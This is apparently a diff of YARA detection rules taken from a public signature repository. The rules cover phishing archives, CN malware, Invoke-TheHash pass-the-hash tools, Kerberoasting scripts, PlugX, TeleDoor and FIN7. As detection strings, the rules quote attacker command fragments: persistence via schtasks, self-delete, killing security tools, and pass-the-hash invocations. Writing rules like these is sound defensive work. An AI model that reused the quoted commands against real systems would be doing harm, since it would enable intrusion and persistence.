-		date = "2022-06-23"
+		id = "08b79c7d-c383-5891-af0f-31a92f1ed07d"
+		date = "2017-06-14"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_phish_attachments.yar#L23-L41"
+		reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_invoke_thehash.yar#L32-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "21de56d6209050b429c0cce82fd334d1b38a2a3727db5ead06f36fa9d503e193"
-		score = 65
+		logic_hash = "12aeba5255527a337c49f1c4d1dc506a13ea02da69a8fc509c77bcb07c2135c8"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "140c23514dbf8043b4f293c501c2f9046efcc1c08630621f651cfedb6eed8b97"
+		hash2 = "7565d376665e3cd07d859a5cf37c2332a14c08eb808cc5d187a7f0533dc69e07"
 
 	strings:
-		$pkzip_base64_1 = { 0A 55 45 73 44 42 }
-		$pkzip_base64_2 = { 0A 55 45 73 44 42 }
-		$pkzip_base64_3 = { 0A 55 45 73 48 43 }
-		$iso_1 = "Lmlzb1BL"
-		$iso_2 = "5pc29QS"
-		$iso_3 = "uaXNvUE"
+		$x1 = "Invoke-WMIExec " ascii
+		$x2 = "$target_count = [System.math]::Pow(2,(($target_address.GetAddressBytes().Length * 8) - $subnet_mask_split))" fullword ascii
+		$s1 = "Import-Module $PWD\\Invoke-TheHash.ps1" fullword ascii
+		$s2 = "Import-Module $PWD\\Invoke-SMBClient.ps1" fullword ascii
+		$s3 = "$target_address_list = [System.Net.Dns]::GetHostEntry($target_long).AddressList" fullword ascii
+		$x4 = "Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0" ascii
 
 	condition:
-		filesize < 2000KB and 1 of ( $pk* ) and 1 of ( $iso* )
+		1 of them
 }
-rule SIGNATURE_BASE_SUSP_Archive_Phishing_Attachment_Characteristics_Jun22_1 : FILE
+rule SIGNATURE_BASE_Invoke_Smbexec_Invoke_Wmiexec_1
 {
 	meta:
-		description = "Detects characteristics of suspicious file names or double extensions often found in phishing mail attachments"
+		description = "Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3cb8c371-f40b-5773-84d1-3bce37da529e"
-		date = "2022-06-29"
+		id = "fd1c6599-028d-5535-beb8-5b2658481b97"
+		date = "2017-06-14"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/0xtoxin/status/1540524891623014400?s=12&t=IQ0OgChk8tAIdTHaPxh0Vg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_phish_attachments.yar#L43-L141"
+		reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_invoke_thehash.yar#L53-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "647044fa3b5cf6f0e9e738fa7b7d24f8918b7a7fb359342e1314d97b50debf87"
-		score = 65
-		quality = 60
-		tags = "FILE"
-		hash1 = "caaa5c5733fca95804fffe70af82ee505a8ca2991e4cc05bc97a022e5f5b331c"
-		hash2 = "a746d8c41609a70ce10bc69d459f9abb42957cc9626f2e83810c1af412cb8729"
+		logic_hash = "feb2973cd7e2c221cd91ec543f1d943cf1b5d5d18fe74c8f7e58341f76f95b51"
+		score = 75
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd"
+		hash2 = "b41bd54bbf119d153e0878696cd5a944cbd4316c781dd8e390507b2ec2d949e7"
 
 	strings:
-		$sa01 = "INVOICE.exePK" ascii
-		$sa02 = "PAYMENT.exePK" ascii
-		$sa03 = "REQUEST.exePK" ascii
-		$sa04 = "ORDER.exePK" ascii
-		$sa05 = "invoice.exePK" ascii
-		$sa06 = "payment.exePK" ascii
-		$sa07 = "_request.exePK" ascii
-		$sa08 = "_order.exePK" ascii
-		$sa09 = "-request.exePK" ascii
-		$sa10 = "-order.exePK" ascii
-		$sa11 = " request.exePK" ascii
-		$sa12 = " order.exePK" ascii
-		$sa14 = ".doc.exePK" ascii
-		$sa15 = ".docx.exePK" ascii
-		$sa16 = ".xls.exePK" ascii
-		$sa17 = ".xlsx.exePK" ascii
-		$sa18 = ".pdf.exePK" ascii
-		$sa19 = ".ppt.exePK" ascii
-		$sa20 = ".pptx.exePK" ascii
-		$sa21 = ".rtf.exePK" ascii
-		$sa22 = ".txt.exePK" ascii
-		$sb01 = "SU5WT0lDRS5leGVQS"
-		$sb02 = "lOVk9JQ0UuZXhlUE"
-		$sb03 = "JTlZPSUNFLmV4ZVBL"
-		$sb04 = "UEFZTUVOVC5leGVQS"
-		$sb05 = "BBWU1FTlQuZXhlUE"
-		$sb06 = "QQVlNRU5ULmV4ZVBL"
-		$sb07 = "UkVRVUVTVC5leGVQS"
-		$sb08 = "JFUVVFU1QuZXhlUE"
-		$sb09 = "SRVFVRVNULmV4ZVBL"
-		$sb10 = "T1JERVIuZXhlUE"
-		$sb11 = "9SREVSLmV4ZVBL"
-		$sb12 = "PUkRFUi5leGVQS"
-		$sb13 = "aW52b2ljZS5leGVQS"
-		$sb14 = "ludm9pY2UuZXhlUE"
-		$sb15 = "pbnZvaWNlLmV4ZVBL"
-		$sb16 = "cGF5bWVudC5leGVQS"
-		$sb17 = "BheW1lbnQuZXhlUE"
-		$sb18 = "wYXltZW50LmV4ZVBL"
-		$sb19 = "X3JlcXVlc3QuZXhlUE"
-		$sb20 = "9yZXF1ZXN0LmV4ZVBL"
-		$sb21 = "fcmVxdWVzdC5leGVQS"
-		$sb22 = "X29yZGVyLmV4ZVBL"
-		$sb23 = "9vcmRlci5leGVQS"
-		$sb24 = "fb3JkZXIuZXhlUE"
-		$sb25 = "LXJlcXVlc3QuZXhlUE"
-		$sb26 = "1yZXF1ZXN0LmV4ZVBL"
-		$sb27 = "tcmVxdWVzdC5leGVQS"
-		$sb28 = "LW9yZGVyLmV4ZVBL"
-		$sb29 = "1vcmRlci5leGVQS"
-		$sb30 = "tb3JkZXIuZXhlUE"
-		$sb31 = "IHJlcXVlc3QuZXhlUE"
-		$sb32 = "ByZXF1ZXN0LmV4ZVBL"
-		$sb33 = "gcmVxdWVzdC5leGVQS"
-		$sb34 = "IG9yZGVyLmV4ZVBL"
-		$sb35 = "BvcmRlci5leGVQS"
-		$sb36 = "gb3JkZXIuZXhlUE"
-		$sb37 = "LmRvYy5leGVQS"
-		$sb38 = "5kb2MuZXhlUE"
-		$sb39 = "uZG9jLmV4ZVBL"
-		$sb40 = "LmRvY3guZXhlUE"
-		$sb41 = "5kb2N4LmV4ZVBL"
-		$sb42 = "uZG9jeC5leGVQS"
-		$sb43 = "Lnhscy5leGVQS"
-		$sb44 = "54bHMuZXhlUE"
-		$sb45 = "ueGxzLmV4ZVBL"
-		$sb46 = "Lnhsc3guZXhlUE"
-		$sb47 = "54bHN4LmV4ZVBL"
-		$sb48 = "ueGxzeC5leGVQS"
-		$sb49 = "LnBkZi5leGVQS"
-		$sb50 = "5wZGYuZXhlUE"
-		$sb51 = "ucGRmLmV4ZVBL"
-		$sb52 = "LnBwdC5leGVQS"
-		$sb53 = "5wcHQuZXhlUE"
-		$sb54 = "ucHB0LmV4ZVBL"
-		$sb55 = "LnBwdHguZXhlUE"
-		$sb56 = "5wcHR4LmV4ZVBL"
-		$sb57 = "ucHB0eC5leGVQS"
-		$sb58 = "LnJ0Zi5leGVQS"
-		$sb59 = "5ydGYuZXhlUE"
-		$sb60 = "ucnRmLmV4ZVBL"
-		$sb61 = "LnR4dC5leGVQS"
-		$sb62 = "50eHQuZXhlUE"
-		$sb63 = "udHh0LmV4ZVBL"
+		$s1 = "$process_ID = $process_ID -replace \"-00-00\",\"\"" fullword ascii
+		$s2 = "Write-Output \"$Target did not respond\"" fullword ascii
+		$s3 = "[Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and 1 of ( $sa* ) or 1 of ( $sb* )
+		all of them
 }
-rule SIGNATURE_BASE_CN_Disclosed_20180208_Lsls : FILE
+rule SIGNATURE_BASE_Invoke_Wmiexec_Gen
 {
 	meta:
-		description = "Detects malware from disclosed CN malware set"
+		description = "Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c6c4aa72-1a84-552f-bea0-38b332a74233"
-		date = "2018-02-08"
+		id = "08b79c7d-c383-5891-af0f-31a92f1ed07d"
+		date = "2017-06-14"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyberintproject/status/961714165550342146"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_campaign_njrat.yar#L13-L26"
+		reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_invoke_thehash.yar#L72-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c6542391e8d1a4fe4d26fd8b2dfb1fcab7b39c67dcc6495f2e5f95c4d6f8d61c"
+		logic_hash = "1ee79b7ea576adb71bde903756cda7af22e55eee9c4c3964cc9edc8930083fa2"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9"
+		super_rule = 1
+		hash1 = "56c6012c36aa863663fe5536d8b7fe4c460565d456ce2277a883f10d78893c01"
+		hash2 = "674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd"
+		hash3 = "b41bd54bbf119d153e0878696cd5a944cbd4316c781dd8e390507b2ec2d949e7"
 
 	strings:
-		$x1 = "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" fullword ascii
+		$s1 = "$NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes)" fullword ascii
+		$s2 = "$client_challenge = [String](1..8 | ForEach-Object {\"{0:X2}\" -f (Get-Random -Minimum 1 -Maximum 255)})" fullword ascii
+		$s3 = "$NTLM_hash_bytes = $NTLM_hash_bytes.Split(\"-\") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 3000KB and $x1
+		all of them
 }
-rule SIGNATURE_BASE_CN_Disclosed_20180208_C : FILE
+rule SIGNATURE_BASE_Getuserspns_VBS
 {
 	meta:
-		description = "Detects malware from disclosed CN malware set"
+		description = "Auto-generated rule - file GetUserSPNs.vbs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cb0bcdc4-7eca-59b7-a947-85c232d4e599"
-		date = "2018-02-08"
+		id = "5576c1b9-4670-52c5-b23c-64adcc8709de"
+		date = "2016-05-21"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyberintproject/status/961714165550342146"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_campaign_njrat.yar#L28-L55"
+		reference = "https://github.com/skelsec/PyKerberoast"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_kerberoast.yar#L8-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cfdc7ce8b89a16d2ae604268a030bd41259fed87a7f37b0dca8f7c467703c7f2"
+		logic_hash = "ece81cd717fed6ca1f9053384911fd59462b6f3b01210ceeb037ba3da2f7a318"
 		score = 75
-		quality = 85
-		tags = "FILE"
+		quality = 60
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7"
+		hash1 = "8dcb568d475fd8a0557e70ca88a262b7c06d0f42835c855b52e059c0f5ce9237"
 
 	strings:
-		$x1 = "cmd.exe /c ping 0 -n 2 & del \"" fullword wide
-		$x2 = "schtasks /create /sc minute /mo 1 /tn Server /tr " fullword wide
-		$x3 = "www.upload.ee/image/" wide
-		$s1 = "winmgmts:\\\\.\\root\\SecurityCenter2" fullword wide
-		$s2 = "/Server.exe" fullword wide
-		$s3 = "Executed As " fullword wide
-		$s4 = "WmiPrvSE.exe" fullword wide
-		$s5 = "Stub.exe" fullword ascii
-		$s6 = "Download ERROR" fullword wide
-		$s7 = "shutdown -r -t 00" fullword wide
-		$s8 = "Select * From AntiVirusProduct" fullword wide
+		$s1 = "Wscript.Echo \"User Logon: \" & oRecordset.Fields(\"samAccountName\")" fullword ascii
+		$s2 = "Wscript.Echo \" USAGE:        \" & WScript.ScriptName & \" SpnToFind [GC Servername or Forestname]\"" fullword ascii
+		$s3 = "strADOQuery = \"<\" + strGCPath + \">;(&(!objectClass=computer)(servicePrincipalName=*));\" & _" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 4 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Disclosed_20180208_System3 : FILE
+rule SIGNATURE_BASE_Getuserspns_PS1
 {
 	meta:
-		description = "Detects malware from disclosed CN malware set"
+		description = "Auto-generated rule - file GetUserSPNs.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "097f4506-295d-5066-8895-2148436731c1"
-		date = "2018-02-08"
+		id = "a2fba75c-264f-5e89-afaf-9d19a4a90784"
+		date = "2016-05-21"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyberintproject/status/961714165550342146"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_campaign_njrat.yar#L57-L74"
+		reference = "https://github.com/skelsec/PyKerberoast"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_kerberoast.yar#L25-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8292ae1de39c57bc5ed6fa078570e92dbcd22cd13d5b5f22d158986708139fbe"
+		logic_hash = "204b009677a02bf8725f928c2bfff321b4543a883760e312a0c92f187684c8e9"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "73fa84cff51d384c2d22d9e53fc5d42cb642172447b07e796c81dd403fb010c2"
+		hash1 = "1b69206b8d93ac86fe364178011723f4b1544fff7eb1ea544ab8912c436ddc04"
 
 	strings:
-		$a1 = "WmiPrvSE.exe" fullword wide
-		$s1 = "C:\\Users\\sgl\\AppData\\Local\\" ascii
-		$s2 = "Temporary Projects\\WmiPrvSE\\" ascii
-		$s3 = "$15a32a5d-4906-458a-8f57-402311afc1c1" fullword ascii
+		$s1 = "$ForestInfo = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()" fullword ascii
+		$s2 = "@{Name=\"PasswordLastSet\";      Expression={[datetime]::fromFileTime($result.Properties[\"pwdlastset\"][0])} } #, `" fullword ascii
+		$s3 = "Write-Host \"No Global Catalogs Found!\"" fullword ascii
+		$s4 = "$searcher.PropertiesToLoad.Add(\"pwdlastset\") | Out-Null" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and $a1 and 1 of ( $s* )
+		2 of them
 }
-
-rule SIGNATURE_BASE_CN_Disclosed_20180208_Mal1 : FILE
+rule SIGNATURE_BASE_Kerberoast_PY
 {
 	meta:
-		description = "Detects malware from disclosed CN malware set"
+		description = "Auto-generated rule - file kerberoast.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8516bbfb-a2ad-565d-bf6c-71629b1831a1"
-		date = "2018-02-08"
+		id = "cea6cdb2-cd1a-5701-a9d1-27c788a962a7"
+		date = "2016-05-21"
 		modified = "2023-12-05"
-		reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_campaign_njrat.yar#L77-L103"
+		reference = "https://github.com/skelsec/PyKerberoast"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_kerberoast.yar#L43-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cf532761d07ee3e84028a9071409f081a7a85728d55c215c912f0b70902f101f"
+		logic_hash = "3b285cc55733bd4c499ffb4821a92675806bf66faf3b3565ffb6de867bed538d"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e"
+		hash1 = "73155949b4344db2ae511ec8cab85da1ccbf2dfec3607fb9acdc281357cdf380"
 
 	strings:
-		$x1 = "%SystemRoot%\\system32\\termsrvhack.dll" fullword ascii
-		$x2 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
-		$a1 = "taskkill /f /im cmd.exe" fullword ascii
-		$a2 = "taskkill /f /im mstsc.exe" fullword ascii
-		$a3 = "taskkill /f /im taskmgr.exe" fullword ascii
-		$a4 = "taskkill /f /im regedit.exe" fullword ascii
-		$a5 = "taskkill /f /im mmc.exe" fullword ascii
-		$s1 = "K7TSecurity.exe" fullword ascii
-		$s2 = "ServUDaemon.exe" fullword ascii
+		$s1 = "newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)" fullword ascii
+		$s2 = "key = kerberos.ntlmhash(args.password)" fullword ascii
+		$s3 = "help='the password used to decrypt/encrypt the ticket')" fullword ascii
+		$s4 = "newencserverticket = kerberos.encrypt(key, 2, e, nonce)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "28e3a58132364197d7cb29ee104004bf" or 1 of ( $x* ) or 3 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Disclosed_20180208_Keylogger_1 : FILE
+rule SIGNATURE_BASE_Aptgroupx_Plugxtrojanloader_Stringdecode
 {
 	meta:
-		description = "Detects malware from disclosed CN malware set"
-		author = "Florian Roth (Nextron Systems)"
-		id = "12eff9b6-1a65-5efc-b39c-88297bdae9c3"
-		date = "2018-02-08"
+		description = "Rule to detect PlugX Malware"
+		author = "Jay DiMartino"
+		id = "c6017327-b44d-5b1d-95aa-6e1f9fbf5583"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_campaign_njrat.yar#L105-L122"
+		reference = "https://t.co/4xQ8G2mNap"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_plugx.yar#L2-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "efba7004614c690e469082255cf7b5cb62cac5da2bfcc26e036e2eafcb5728f9"
-		score = 75
+		logic_hash = "e5ab15b035bb0169864e687e5c26732dd5b8f5f184473a33e685f53699ce4acc"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf"
+		tags = ""
+		hash1 = "0535e8c300204e257f0fa57630f386e9fcc8e779"
+		hash2 = "088ebf9ccde958f32d11f4e7eb14f5332332f97d"
+		hash3 = "0c999d0bffa007e9e6b6fe593933b52f40c75b3d"
+		hash4 = "2f644e7131ec0a4f12ce04ba1e54d23856dbbfbf"
+		hash5 = "3be9148ad132ca342d5fbabea1119a175ef1df7c"
+		hash6 = "4c1ee94ec0e15491fc4f6b4095f67eee6309e62a"
+		hash7 = "587af7ce05e61d4c312d6bae12ea380116b08d7e"
+		hash8 = "5990efd83b5646a7ba419541d3a2c19260224ca3"
+		hash9 = "67970367c250c44a5feb263843cf45fd91336df5"
+		hash10 = "68f53f7188910a4cf67843aedd38c1523f1f2e7c"
+		hash11 = "962dc7e0ad37286df012f623423ac4182fe791ca"
+		hash12 = "aa0976906807af2e1b127608040aa3ef6e118a13"
+		hash13 = "b170d015e32b39fa4ac15f94d58e45e65cd16d6c"
+		hash14 = "c9b3d2cef3b34c7ee18fc2f60ff022965959613d"
+		hash15 = "cd425ce7f3e4a823d9027780e1b439759c4dc665"
+		hash16 = "d5e82513c6472d3826a22d9a15c05af8c0d33b58"
+		hash17 = "d9b32084f27ef13001060e1dcee8a1a9e95d89a6"
+		hash18 = "daa2d1cb9148b7ba5a86fa9ab593678e77c92672"
+		hash19 = "e2c098a95d1c1f0e29f207af9c5ffc5bd69a92ee"
+		hash20 = "ef8cf68dc3c80e9cb5a3fa0f92b544eab583812e"
+		hash21 = "f0fc0a4e4e0748464caa6a202d0083cd33458677"
+		hash22 = "fe1abe55529c1d6aa6b2a2f02d7e41ea58040feb"
 
 	strings:
-		$x2 = "Process already elevated." fullword wide
-		$x3 = "GetKeyloggErLogsResponse" fullword ascii
-		$x4 = "get_encryptedPassword" fullword ascii
-		$x5 = "DoDownloadAndExecute" fullword ascii
-		$x6 = "GetKeyloggeRLogs" fullword ascii
+		$byte1 = { 8A [2-4] 8A [2-4] FF 05 00 30 00 10 [0-5] 2A [1-6] 80 [2-7] 02 [1-6] 88 0? }
+		$byte2 = { 8B [2-4] 8A [2-4] FF 05 00 30 00 10 [0-5] 2A [1-6] 80 [2-7] 02 [1-6] 88 0? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
+		any of them
 }
-
-rule SIGNATURE_BASE_CN_Disclosed_20180208_Mal4 : FILE
+rule SIGNATURE_BASE_Teledoor_Backdoor : FILE
 {
 	meta:
-		description = "Detects malware from disclosed CN malware set"
+		description = "Detects the TeleDoor Backdoor as used in Petya Attack in June 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6165caf5-157f-5381-a77e-6ed775187ab1"
-		date = "2018-02-08"
+		id = "ba9b4415-427e-5a13-b743-bed225d86db8"
+		date = "2017-07-05"
 		modified = "2023-12-05"
-		reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_campaign_njrat.yar#L124-L138"
+		reference = "https://goo.gl/CpfJQQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_teledoor.yar#L11-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "044901271adb06036e7d5aa8f2b6f893be10445bee95453c293d0025994e8d21"
+		logic_hash = "785360fa19a61a547309fc7a8968c94d4887be001c6a66b41c7adb9dcd13cb82"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f7549c74f09be7e4dbfb64006e535b9f6d17352e236edc2cdb102ec3035cf66e"
+		hash1 = "d462966166450416d6addd3bfdf48590f8440dd80fc571a389023b7c860ca3ac"
+		hash2 = "f9d6fe8bd8aca6528dec7eaa9f1aafbecde15fd61668182f2ba8a7fc2b9a6740"
+		hash3 = "2fd2863d711a1f18eeee5c7c82f2349c5d4e00465de9789da837fcdca4d00277"
 
 	strings:
-		$s1 = "Microsoft .Net Framework COM+ Support" fullword ascii
-		$s2 = "Microsoft .NET and Windows XP COM+ Integration with SOAP" fullword ascii
+		$c1 = { 50 61 79 6C 6F 61 64 00 41 75 74 6F 50 61 79 6C 6F 61 64 }
+		$c2 = { 52 75 6E 43 6D 64 00 44 75 6D 70 44 61 74 61 }
+		$c3 = { 00 5A 76 69 74 57 65 62 43 6C 69 65 6E 74 45 78 74 00 4D 69 6E 49 6E 66 6F }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them and pe.exports ( "SPACE" )
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and 2 of them )
 }
-rule SIGNATURE_BASE_CN_Disclosed_20180208_Mal5 : FILE
+rule SIGNATURE_BASE_APT_FIN7_Strings_Aug18_1
 {
 	meta:
-		description = "Detects malware from disclosed CN malware set"
+		description = "Detects strings from FIN7 report in August 2018"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1933610-9e6d-5eed-ba30-ccdd0d3a6124"
-		date = "2018-02-08"
+		id = "9b940986-e41b-5fbf-9e42-cb0fd550e541"
+		date = "2018-08-01"
 		modified = "2023-12-05"
-		reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cn_campaign_njrat.yar#L140-L160"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L13-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "971276d5033477a08a1ec037cff9735667c2b4f7d9d4a7bcd88f2b1d8c348d4f"
+		logic_hash = "89d2f8f28a7ab0e78c53d8c41b45efa60cfa9ff72306c49197f52342d9a3c546"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "24c05cd8a1175fbd9aca315ec67fb621448d96bd186e8d5e98cb4f3a19482af4"
-		hash2 = "05696db46144dab3355dcefe0408f906a6d43fced04cb68334df31c6dfd12720"
+		hash1 = "b6354e46af0d69b6998dbed2fceae60a3b207584e08179748e65511d45849b00"
 
 	strings:
-		$s1 = "4System.Web.Services.Protocols.SoapHttpClientProtocol" fullword ascii
-		$s2 = "Server.exe" fullword ascii
-		$s3 = "System.Windows.Forms.Form" fullword ascii
-		$s4 = "Stub.Resources.resources" fullword ascii
-		$s5 = "My.Computer" fullword ascii
-		$s6 = "MyTemplate" fullword ascii
-		$s7 = "Stub.My.Resources" fullword ascii
+		$s1 = "&&call %a01%%a02% /e:jscript" ascii
+		$s2 = "wscript.exe //b /e:jscript %TEMP%" ascii
+		$s3 = " w=wsc@ript /b " ascii
+		$s4 = "@echo %w:@=%|cmd" ascii
+		$s5 = " & wscript //b /e:jscript"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_APT_NK_Methodology_Artificial_Useragent_IE_Win7 : FILE
+rule SIGNATURE_BASE_APT_FIN7_Sample_Aug18_2 : FILE
 {
 	meta:
-		description = "Detects hard-coded User-Agent string that has been present in several APT37 malware families."
-		author = "Steve Miller aka @stvemillertime"
-		id = "a747c908-7af7-5c29-8386-a71db7648061"
-		date = "2023-12-05"
+		description = "Detects FIN7 malware sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "885eebfe-2587-5744-ba0c-c74ced946050"
+		date = "2018-08-01"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt37.yar#L1-L17"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L32-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "43119b83a7eaf3dade9477d342b5656970940e9b4f41b3ba5f720d7fbe927762"
-		score = 45
+		logic_hash = "a46492383db5af8f60984b42c53a792632f836f1668fca2d564e0f1f1ed313f2"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "e63efbf8624a531bb435b7446dbbfc25"
